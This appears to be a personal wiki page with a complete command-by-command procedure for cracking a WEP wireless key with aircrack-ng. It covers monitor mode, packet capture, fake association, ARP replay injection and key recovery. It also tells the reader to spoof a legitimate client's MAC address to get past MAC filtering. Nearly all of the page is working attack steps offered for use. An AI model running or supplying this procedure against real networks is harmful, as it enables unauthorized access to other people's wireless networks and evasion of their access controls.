Cracking A WEP Key

From Nearline Storage
Jump to navigation Jump to search
  • Download aircrack-ng source
 svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
  • Change ~/src/aircrack-ng/common.mak:
 CFLAGS          ?= -g -W -Wall -Werror -fno-strict-aliasing -O3
  • Compile and install:
 make && sudo make install
  • Use kismet to get the channel (11), ESSid (crackme), and BSSid (00:18:4D:85:65:4F) for the access point to be cracked

These tools are fussy about the hex addresses, include leading zeros and don't use lower case hex digits

  • Become root:
 su -
  • Put NIC into monitor mode:
 airmon-ng start wlan0
  • Start capturing packets:
 airodump-ng -w dumpfile -c 11 -i mon0


New terminal session:

  • Associate with the target AP
 /usr/local/sbin/aireplay-ng -1 0 -e crackme -a 00:18:4D:85:65:4F -h 00:01:02:03:04:05 mon0

If that doesn't associate successfully then it may be that they have MAC filtering turned on. Observe the dump output for a while until you see a client associate successfully. Take its MAC address and substitute that for -h.

  • Start replaying packets so that we can collect more packets:
 /usr/local/sbin/aireplay-ng -3 -e crackme -a 00:18:4D:85:65:4F -h 00:01:02:03:04:05 mon0

Watch the Data column in the airodump-ng session, we want more than 100,000 unique IV headers.

  • Ctrl-C the dump process and crack the key:
 aircrack-ng dumpfile.ivs